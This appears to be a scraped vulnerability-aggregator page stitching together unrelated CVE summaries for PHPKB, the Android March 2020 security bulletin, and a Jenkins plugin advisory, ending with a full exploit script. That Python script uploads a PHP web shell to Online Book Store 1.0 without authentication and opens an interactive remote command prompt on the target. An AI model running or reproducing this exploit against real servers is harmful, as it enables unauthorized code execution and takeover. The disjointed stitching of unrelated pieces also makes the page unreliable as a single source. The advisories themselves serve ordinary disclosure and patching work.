Reflected XSS in admin/manage-news.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.

March 19, 2019

**Analyzing PHPKB v9: Part one**

The first part of a series where I will talk about vulnerabilities found in a knowledge-base software written in PHP. Vulnerabilities analyzed: Arbitrary File Download, Remote Code Execution, Blind Cross-Site Scripting, Arbitrary File Renaming, Arbitrary Folder Deletion, CSV Injection, Arbitrary File Listing.

CVE-2020-10477: Home

CSRF in admin/manage-settings.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to change the global settings, potentially gaining code execution or causing a denial of service, via a crafted request.

CVE-2020-10478: Home

CSRF in admin/add-news.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new news article via a crafted request.

CVE-2020-10479: Home

CSRF in admin/add-glossary.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new glossary term via a crafted request.

CVE-2020-10481: Home

Reflected XSS in admin/manage-articles.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.

CVE-2020-10471: Home

CSRF in admin/add-category.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new category via a crafted request.

CVE-2020-10480: Home

In binder_transaction of binder.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-145988638References: Upstream kernel

_Published March 2, 2020 | Updated March 9, 2020_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2020-03-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a critical security vulnerability in the media framework that could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2020-03-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2020-03-01 patch level. Vulnerabilities are grouped under the component that they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The vulnerability in this section could enable a local malicious application to bypass operating system protections that isolate application data from other applications.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-0031

A-141703197 \[2\]

ID

High

10

**Media framework**

The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-0032

A-145364230

RCE

Critical

8.0, 8.1, 9, 10

CVE-2020-0033

A-144351324

EoP

High

8.0, 8.1, 9, 10

CVE-2020-0034

A-62458770

ID

High

8.0, 8.1

**System**

The most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-0036

A-144679405

EoP

High

8.0, 8.1, 9, 10

CVE-2020-0035

A-140622024

ID

High

8.0, 8.1, 9

CVE-2020-0029

A-140065828

ID

High

10

CVE-2020-0037

A-143106535

ID

High

8.0, 8.1, 9, 10

CVE-2020-0038

A-143109193

ID

High

8.0, 8.1, 9, 10

CVE-2020-0039

A-143155861

ID

High

8.0, 8.1, 9, 10

**Google Play system updates**

The following issue is included in Project Mainline components.

 

Component

CVE

Media codecs

CVE-2020-0032

**2020-03-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2020-03-05 patch level. Vulnerabilities are grouped under the component they affect and include details such as the CVE, associated references, type of vulnerability, severity, component (where applicable), and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, such as the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel components**

The most severe vulnerability in this section could enable a local attacker using a specially crafted USB device to execute arbitrary code within the context of a privileged process.

    

CVE

References

Type

Severity

Component

CVE-2019-19527

A-146257915  
Upstream kernel \[2\]

EoP

High

USB

CVE-2019-19537

A-146258055  
Upstream kernel

EoP

High

USB

CVE-2019-15239

A-143009752  
Upstream kernel

EoP

High

Networking

CVE-2020-0041

A-145988638  
Upstream kernel

EoP

High

Binder

**FPC components**

The most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions.

    

CVE

References

Type

Severity

Component

CVE-2020-0010

A-137014293\*

EoP

High

FPC Fingerprint TEE

CVE-2020-0011

A-137648045\*

EoP

High

FPC Fingerprint TEE

CVE-2020-0012

A-137648844\*

EoP

High

FPC Fingerprint TEE

CVE-2020-0042

A-137649599\*

ID

Moderate

FPC Fingerprint TEE

CVE-2020-0043

A-137650218\*

ID

Moderate

FPC Fingerprint TEE

CVE-2020-0044

A-137650219\*

ID

Moderate

FPC Fingerprint TEE

**MediaTek components**

    

CVE

References

Type

Severity

Component

CVE-2020-0069

A-147882143\*  
M-ALPS04356754

EoP

High

System

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Type

Severity

Component

CVE-2019-14079

A-138848422  
QC-CR#2521001

N/A

High

USB

CVE-2018-11838

A-145545090  
QC-CR#221457 \[2\]

N/A

High

WLAN

CVE-2019-10526

A-145544085  
QC-CR#2232526  
QC-CR#2541970

N/A

High

WLAN

CVE-2019-10569

A-145545820  
QC-CR#2315791

N/A

High

Audio

CVE-2019-14029

A-145546793  
QC-CR#2528795

N/A

High

Graphics

CVE-2019-14032

A-145546652  
QC-CR#2537311

N/A

High

Audio

CVE-2019-14068

A-145546435  
QC-CR#2507653 \[2\]

N/A

High

Audio

CVE-2019-14072

A-145545251  
QC-CR#2509391

N/A

High

Graphics

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Type

Severity

Component

CVE-2019-2317

A-134436812\*

N/A

Critical

Closed-source component

CVE-2019-10586

A-140423909\*

N/A

Critical

Closed-source component

CVE-2019-10587

A-140423816\*

N/A

Critical

Closed-source component

CVE-2019-10593

A-140424165\*

N/A

Critical

Closed-source component

CVE-2019-10594

A-140424564\*

N/A

Critical

Closed-source component

CVE-2019-10612

A-140423161\*

N/A

Critical

Closed-source component

CVE-2019-14031

A-142271912\*

N/A

Critical

Closed-source component

CVE-2019-14045

A-140973418\*

N/A

Critical

Closed-source component

CVE-2019-14071

A-145545489\*

N/A

Critical

Closed-source component

CVE-2019-14083

A-140973259\*

N/A

Critical

Closed-source component

CVE-2019-14086

A-140973417\*

N/A

Critical

Closed-source component

CVE-2019-14030

A-145546515\*

N/A

Critical

Closed-source component

CVE-2019-14097

A-145546003\*

N/A

Critical

Closed-source component

CVE-2019-14098

A-145546314\*

N/A

Critical

Closed-source component

CVE-2019-10546

A-145545250\*

N/A

Critical

Closed-source component

CVE-2019-14095

A-142843397\*

N/A

Critical

Closed-source component

CVE-2018-11970

A-114042111\*

N/A

High

Closed-source component

CVE-2019-10603

A-140424074\*

N/A

High

Closed-source component

CVE-2019-10616

A-140423338\*

N/A

High

Closed-source component

CVE-2019-10549

A-140423162\*

N/A

High

Closed-source component

CVE-2019-10550

A-140423702\*

N/A

High

Closed-source component

CVE-2019-10552

A-140423817\*

N/A

High

Closed-source component

CVE-2019-10553

A-140423081\*

N/A

High

Closed-source component

CVE-2019-10554

A-140424012\*

N/A

High

Closed-source component

CVE-2019-10577

A-140424166\*

N/A

High

Closed-source component

CVE-2019-14026

A-142271986\*

N/A

High

Closed-source component

CVE-2019-14027

A-142271756\*

N/A

High

Closed-source component

CVE-2019-14028

A-142271831\*

N/A

High

Closed-source component

CVE-2019-2300

A-142271659\*

N/A

High

Closed-source component

CVE-2019-2311

A-142271967\*

N/A

High

Closed-source component

CVE-2019-14050

A-143902706\*

N/A

High

Closed-source component

CVE-2019-14081

A-143902882\*

N/A

High

Closed-source component

CVE-2019-14082

A-140974589\*

N/A

High

Closed-source component

CVE-2019-14085

A-143902807\*

N/A

High

Closed-source component

CVE-2019-14048

A-145545282\*

N/A

High

Closed-source component

CVE-2019-14061

A-145545758\*

N/A

High

Closed-source component

CVE-2019-10604

A-145545725\*

N/A

High

Closed-source component

CVE-2019-10591

A-145545283\*

N/A

High

Closed-source component

CVE-2019-14000

A-145546434\*

N/A

High

Closed-source component

CVE-2019-14015

A-145545650\*

N/A

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2020-03-01 or later address all issues associated with the 2020-03-01 security patch level.
*   Security patch levels of 2020-03-05 or later address all issues associated with the 2020-03-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2020-03-01\]
*   \[ro.build.version.security\_patch\]:\[2020-03-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2020-03-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2020-03-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2020-03-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the Android bug ID in the _References_ column. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

March 2, 2020

Bulletin published

1.1

March 3, 2020

Bulletin revised to include AOSP links

1.2

March 9, 2020

Updated issue list

CVE-2020-0041: Android Security Bulletin—March 2020  |  Android Open Source Project

Jenkins Timestamper Plugin 1.11.1 and earlier does not sanitize HTML formatting of its output, resulting in a stored XSS vulnerability exploitable by attackers with Overall/Administer permission.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Audit Trail Plugin
*   Backlog Plugin
*   Cobertura Plugin
*   CryptoMove Plugin
*   DeployHub Plugin
*   Git Plugin
*   Literate Plugin
*   Logstash Plugin
*   Mac Plugin
*   OpenShift Deployer Plugin
*   P4 Plugin
*   Quality Gates Plugin
*   Repository Connector Plugin
*   Rundeck Plugin
*   Script Security Plugin
*   Skytap Cloud CI Plugin
*   Sonar Quality Gates Plugin
*   Subversion Release Manager Plugin
*   Timestamper Plugin
*   Zephyr Enterprise Test Management Plugin
*   Zephyr for JIRA Test Management Plugin

**Descriptions****Sandbox bypass vulnerability in Script Security Plugin**

**SECURITY-1754 / CVE-2020-2134 (constructors), CVE-2020-2135 (GroovyInterceptable)**  
**Severity (CVSS):** High  
**Affected plugin: script-security**  
**Description:**

Sandbox protection in Script Security Plugin 1.70 and earlier can be circumvented through:

*   Crafted constructor calls and bodies (due to an incomplete fix of SECURITY-582)
    
*   Crafted method calls on objects that implement GroovyInterceptable
    

This allows attackers able to specify and run sandboxed scripts to execute arbitrary code in the context of the Jenkins controller JVM.

Script Security Plugin 1.71 has additional restrictions and sanity checks to ensure that super constructors cannot be constructed without being intercepted by the sandbox. In addition, it also intercepts method calls on objects that implement GroovyInterceptable as calls to GroovyObject#invokeMethod(String, Object), which is on the list of dangerous signatures and should not be approved for use in the sandbox.

**Stored XSS vulnerability in Git Plugin**

**SECURITY-1723 / CVE-2020-2136**  
**Severity (CVSS):** Medium  
**Affected plugin: git**  
**Description:**

Git Plugin 4.2.0 and earlier does not escape the error message for the repository URL for Microsoft TFS field form validation.

This results in a stored cross-site scripting vulnerability that can be exploited by users with Job/Configure permission.

Git Plugin 4.2.1 escapes the affected part of the error message.

**Stored XSS vulnerability in Timestamper Plugin**

**SECURITY-1784 / CVE-2020-2137**  
**Severity (CVSS):** Medium  
**Affected plugin: timestamper**  
**Description:**

Timestamper Plugin 1.11.1 and earlier does not escape or sanitize the HTML formatting used to display the timestamps in console output for builds.

This results in a stored cross-site scripting vulnerability that can be exploited by users with Overall/Administer permission.

Timestamper Plugin 1.11.2 sanitizes the HTML formatting for timestamps and only allows basic, safe HTML formatting.

**XXE vulnerability in Cobertura Plugin**

**SECURITY-1700 / CVE-2020-2138**  
**Severity (CVSS):** High  
**Affected plugin: cobertura**  
**Description:**

Cobertura Plugin 1.15 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows a user able to control the input files for the 'Publish Cobertura Coverage Report' post-build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

Cobertura Plugin 1.16 disables external entity resolution for its XML parser.

**Arbitrary file write vulnerability in Cobertura Plugin**

**SECURITY-1668 / CVE-2020-2139**  
**Severity (CVSS):** Medium  
**Affected plugin: cobertura**  
**Description:**

Cobertura Plugin 1.15 and earlier does not validate file paths from the XML file it parses.

This allows attackers able to control the coverage report content to overwrite any file on the Jenkins controller file system.

Cobertura Plugin 1.16 sanitizes the file paths to prevent escape from the base directory.

**XSS vulnerability in Audit Trail Plugin**

**SECURITY-1722 / CVE-2020-2140**  
**Severity (CVSS):** Medium  
**Affected plugin: audit-trail**  
**Description:**

Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation.

This results in a reflected cross-site scripting vulnerability that can also be exploited similar to a stored cross-site scripting vulnerability by users with Overall/Administer permission.

Audit Trail Plugin 3.3 escapes the affected part of the error message.

**CSRF vulnerability and missing permission checks in P4 Plugin**

**SECURITY-1765 / CVE-2020-2141 (CSRF), CVE-2020-2142 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: p4**  
**Description:**

P4 Plugin 1.10.10 and earlier does not perform permission checks in several HTTP endpoints. This allows users with Overall/Read access to trigger builds or add labels in the Perforce repository.

Additionally, these endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

P4 Plugin 1.10.11 requires POST requests and appropriate user permissions for the affected HTTP endpoints.

**Credentials transmitted in plain text by Logstash Plugin**

**SECURITY-1516 / CVE-2020-2143**  
**Severity (CVSS):** Low  
**Affected plugin: logstash**  
**Description:**

Logstash Plugin stores credentials in its global configuration file jenkins.plugins.logstash.LogstashConfiguration.xml on the Jenkins controller as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Logstash Plugin 2.3.1 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

Logstash Plugin 2.3.2 transmits the credentials in its global configuration encrypted.

**XXE vulnerability in Rundeck Plugin**

**SECURITY-1702 / CVE-2020-2144**  
**Severity (CVSS):** High  
**Affected plugin: rundeck**  
**Description:**

Rundeck Plugin 3.6.6 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows a user with Overall/Read access to have Jenkins parse a crafted HTTP request with XML data that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

Rundeck Plugin 3.6.7 disables external entity resolution for its XML parser.

**Credentials stored in plain text by Zephyr Enterprise Test Management Plugin**

**SECURITY-1596 / CVE-2020-2145**  
**Severity (CVSS):** Low  
**Affected plugin: zephyr-enterprise-test-management**  
**Description:**

Zephyr Enterprise Test Management Plugin 1.9.1 and earlier stores its Zephyr password in plain text in the global configuration file com.thed.zephyr.jenkins.reporter.ZeeReporter.xml. This password can be viewed by users with access to the Jenkins controller file system.

Zephyr Enterprise Test Management Plugin 1.10 integrates with Credentials Plugin.

**Missing SSH host key validation in Mac Plugin**

**SECURITY-1692 / CVE-2020-2146**  
**Severity (CVSS):** Medium  
**Affected plugin: mac**  
**Description:**

Mac Plugin 1.1.0 and earlier does not use SSH host key validation when connecting to Mac Cloud host launched by the plugin. This lack of validation could be abused using a man-in-the-middle attack to intercept these connections to build agents.

Mac Plugin 1.2.0 validates SSH host keys when connecting to agents.

**CSRF vulnerability and missing permission checks in Mac Plugin**

**SECURITY-1761 / CVE-2020-2147 (CSRF), CVE-2020-2148 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: mac**  
**Description:**

Mac Plugin 1.1.0 and earlier does not perform permission checks on a method implementing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified SSH host using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

This form validation method requires POST requests and Overall/Administer permission in Mac Plugin 1.2.0.

**Credentials transmitted in plain text by Repository Connector Plugin**

**SECURITY-1520 / CVE-2020-2149**  
**Severity (CVSS):** Low  
**Affected plugin: repository-connector**  
**Description:**

Repository Connector Plugin stores credentials in its global configuration file org.jvnet.hudson.plugins.repositoryconnector.RepositoryConfiguration.xml on the Jenkins controller as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Repository Connector Plugin 1.2.6 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by Sonar Quality Gates Plugin**

**SECURITY-1523 / CVE-2020-2150**  
**Severity (CVSS):** Low  
**Affected plugin: sonar-quality-gates**  
**Description:**

Sonar Quality Gates Plugin stores credentials in its global configuration file org.quality.gates.jenkins.plugin.GlobalConfig.xml on the Jenkins controller as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Sonar Quality Gates Plugin 1.3.1 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by Quality Gates Plugin**

**SECURITY-1519 / CVE-2020-2151**  
**Severity (CVSS):** Low  
**Affected plugin: quality-gates**  
**Description:**

Quality Gates Plugin stores credentials in its global configuration file quality.gates.jenkins.plugin.GlobalConfig.xml on the Jenkins controller as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Quality Gates Plugin 2.5 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**XSS vulnerability in Subversion Release Manager Plugin**

**SECURITY-1727 / CVE-2020-2152**  
**Severity (CVSS):** Medium  
**Affected plugin: svn-release-mgr**  
**Description:**

Subversion Release Manager Plugin 1.2 and earlier does not escape the error message for the Repository URL field form validation.

This results in a reflected cross-site scripting vulnerability that can also be exploited similar to a stored cross-site scripting vulnerability by users with Job/Configure permission.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by Backlog Plugin**

**SECURITY-1510 / CVE-2020-2153**  
**Severity (CVSS):** Low  
**Affected plugin: backlog**  
**Description:**

Backlog Plugin stores credentials in job config.xml files as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Backlog Plugin 2.4 and earlier. These credentials could be viewed by users with Extended Read permission.

As of publication of this advisory, there is no fix.

**Credentials stored in plain text by Zephyr for JIRA Test Management Plugin**

**SECURITY-1550 / CVE-2020-2154**  
**Severity (CVSS):** Low  
**Affected plugin: zephyr-for-jira-test-management**  
**Description:**

Zephyr for JIRA Test Management Plugin 1.5 and earlier stores Jira credentials unencrypted in its global configuration file com.thed.zephyr.jenkins.reporter.ZfjReporter.xml on the Jenkins controller. These credentials can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by OpenShift Deployer Plugin**

**SECURITY-1518 / CVE-2020-2155**  
**Severity (CVSS):** Low  
**Affected plugin: openshift-deployer**  
**Description:**

OpenShift Deployer Plugin stores credentials in its global configuration file org.jenkinsci.plugins.openshift.DeployApplication.xml on the Jenkins controller as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by OpenShift Deployer Plugin 1.2.0 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by DeployHub Plugin**

**SECURITY-1511 / CVE-2020-2156**  
**Severity (CVSS):** Low  
**Affected plugin: deployhub**  
**Description:**

DeployHub Plugin stores credentials in job config.xml files as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by DeployHub Plugin 8.0.14 and earlier. These credentials could be viewed by users with Extended Read permission.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by Skytap Cloud CI Plugin**

**SECURITY-1522 / CVE-2020-2157**  
**Severity (CVSS):** Low  
**Affected plugin: skytap**  
**Description:**

Skytap Cloud CI Plugin stores credentials in job config.xml files as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Skytap Cloud CI Plugin 2.07 and earlier. These credentials could be viewed by users with Extended Read permission.

As of publication of this advisory, there is no fix.

**RCE vulnerability in Literate Plugin**

**SECURITY-1750 / CVE-2020-2158**  
**Severity (CVSS):** High  
**Affected plugin: literate**  
**Description:**

Literate Plugin 1.0 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types. This results in a remote code execution vulnerability exploitable by users able to provide YAML input files to Literate Plugin’s build step.

As of publication of this advisory, there is no fix.

**OS command injection in CryptoMove Plugin**

**SECURITY-1635 / CVE-2020-2159**  
**Severity (CVSS):** High  
**Affected plugin: cryptomove**  
**Description:**

CryptoMove Plugin 0.1.33 and earlier allows the configuration of an OS command to execute as part of its build step configuration.

This command will be executed on the Jenkins controller as the OS user account running Jenkins, allowing user with Job/Configure permission to execute an arbitrary OS command on the Jenkins controller.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-1510: Low
*   SECURITY-1511: Low
*   SECURITY-1516: Low
*   SECURITY-1518: Low
*   SECURITY-1519: Low
*   SECURITY-1520: Low
*   SECURITY-1522: Low
*   SECURITY-1523: Low
*   SECURITY-1550: Low
*   SECURITY-1596: Low
*   SECURITY-1635: High
*   SECURITY-1668: Medium
*   SECURITY-1692: Medium
*   SECURITY-1700: High
*   SECURITY-1702: High
*   SECURITY-1722: Medium
*   SECURITY-1723: Medium
*   SECURITY-1727: Medium
*   SECURITY-1750: High
*   SECURITY-1754: High
*   SECURITY-1761: Medium
*   SECURITY-1765: Medium
*   SECURITY-1784: Medium

**Affected Versions**

*   **Audit Trail Plugin** up to and including 3.2
*   **Backlog Plugin** up to and including 2.4
*   **Cobertura Plugin** up to and including 1.15
*   **CryptoMove Plugin** up to and including 0.1.33
*   **DeployHub Plugin** up to and including 8.0.14
*   **Git Plugin** up to and including 4.2.0
*   **Literate Plugin** up to and including 1.0
*   **Logstash Plugin** up to and including 2.3.1
*   **Mac Plugin** up to and including 1.1.0
*   **OpenShift Deployer Plugin** up to and including 1.2.0
*   **P4 Plugin** up to and including 1.10.10
*   **Quality Gates Plugin** up to and including 2.5
*   **Repository Connector Plugin** up to and including 1.2.6
*   **Rundeck Plugin** up to and including 3.6.6
*   **Script Security Plugin** up to and including 1.70
*   **Skytap Cloud CI Plugin** up to and including 2.07
*   **Sonar Quality Gates Plugin** up to and including 1.3.1
*   **Subversion Release Manager Plugin** up to and including 1.2
*   **Timestamper Plugin** up to and including 1.11.1
*   **Zephyr Enterprise Test Management Plugin** up to and including 1.9.1
*   **Zephyr for JIRA Test Management Plugin** up to and including 1.5

**Fix**

*   **Audit Trail Plugin** should be updated to version 3.3
*   **Cobertura Plugin** should be updated to version 1.16
*   **Git Plugin** should be updated to version 4.2.1
*   **Logstash Plugin** should be updated to version 2.3.2
*   **Mac Plugin** should be updated to version 1.2.0
*   **P4 Plugin** should be updated to version 1.10.11
*   **Rundeck Plugin** should be updated to version 3.6.7
*   **Script Security Plugin** should be updated to version 1.71
*   **Timestamper Plugin** should be updated to version 1.11.2
*   **Zephyr Enterprise Test Management Plugin** should be updated to version 1.10

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Backlog Plugin
*   CryptoMove Plugin
*   DeployHub Plugin
*   Literate Plugin
*   OpenShift Deployer Plugin
*   Quality Gates Plugin
*   Repository Connector Plugin
*   Skytap Cloud CI Plugin
*   Sonar Quality Gates Plugin
*   Subversion Release Manager Plugin
*   Zephyr for JIRA Test Management Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Cheng Gao, Alibaba Cloud Intelligence Security Team, https://www.aliyun.com/** for SECURITY-1702
*   **Federico Pellegrin** for SECURITY-1668, SECURITY-1700
*   **Ian Williams** for SECURITY-1596
*   **James Holderness, IB Boost** for SECURITY-1510, SECURITY-1511, SECURITY-1516, SECURITY-1518, SECURITY-1519, SECURITY-1520, SECURITY-1522, SECURITY-1523, SECURITY-1550
*   **Nils Emmerich of ERNW Research GmbH** for SECURITY-1754
*   **Raihaan Shouhell, Autodesk, Inc** for SECURITY-1692
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1722, SECURITY-1723, SECURITY-1727, SECURITY-1761, SECURITY-1765, SECURITY-1784
*   **Wasin Saengow** for SECURITY-1635

CVE-2020-2137: Jenkins Security Advisory 2020-03-09

Jenkins CryptoMove Plugin 0.1.33 and earlier allows attackers with Job/Configure access to execute arbitrary OS commands on the Jenkins master as the OS user account running Jenkins.

CVE-2020-2159: Jenkins Security Advisory 2020-03-09

An unauthenticated file upload vulnerability has been identified in admin_add.php in PHPGurukul Online Book Store 1.0. The vulnerability could be exploited by an unauthenticated remote attacker to upload content to the server, including PHP files, which could result in command execution.

    # Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
    # Google Dork: N/A
    # Date: 2020-01-07
    # Exploit Author: Tib3rius
    # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
    # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
    # Version: 1.0
    # Tested on: Ubuntu 16.04
    # CVE: N/A
    
    import argparse
    import random
    import requests
    import string
    import sys
    
    parser = argparse.ArgumentParser()
    parser.add_argument('url', action='store', help='The URL of the target.')
    args = parser.parse_args()
    
    url = args.url.rstrip('/')
    random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
    
    payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
    
    file = {'image': (random_file + '.php', payload, 'text/php')}
    print('> Attempting to upload PHP web shell...')
    r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
    print('> Verifying shell upload...')
    r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
    
    if random_file in r.text:
        print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
        print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
        launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
        if launch_shell.lower() == 'y':
            while True:
                cmd = str(input('RCE $ '))
                if cmd == 'exit':
                    sys.exit(0)
                r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
                print(r.text)
    else:
        if r.status_code == 200:
            print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
        else:
            print('> Web shell failed to upload! The web server may not have write permissions.')

Tag

#rce